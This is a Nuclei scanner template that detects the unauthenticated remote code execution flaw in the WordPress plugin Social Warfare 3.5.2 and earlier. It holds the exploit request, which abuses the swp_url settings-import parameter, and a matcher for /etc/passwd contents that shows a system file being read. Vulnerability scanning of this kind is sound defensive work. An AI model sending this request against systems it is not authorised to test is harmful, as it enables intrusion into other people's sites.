nuclei-templates/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml

47 lines
1.3 KiB
YAML

id: wp-social-warfare-rce
info:
name: Social Warfare <= 3.5.2 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
Unauthenticated remote code execution has been discovered in functionality that handles settings import.
remediation: Fixed in version 3.5.3
reference:
- https://wpscan.com/vulnerability/9259
- https://wordpress.org/plugins/social-warfare/
classification:
cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:wordpress:*:*:*
metadata:
verified: true
max-request: 1
vendor: warfareplugins
product: social_warfare
publicwww-query: "/wp-content/plugins/social-warfare/"
tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
http:
- raw:
- |
GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path: helpers/payloads/wp-social-warfare-rce.txt
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: body
words:
- 'No changes made'
- type: status
status:
- 500
# digest: 4a0a0047304502202f5043a283162e1f7d97fe954654a2edf997c331009951802bc825a8f80d068f022100dc43010b49682c7fae9517d736af5913f9d2339be991955027acdb2d6583e40d:922c64590222798bb761d5b6d8e72950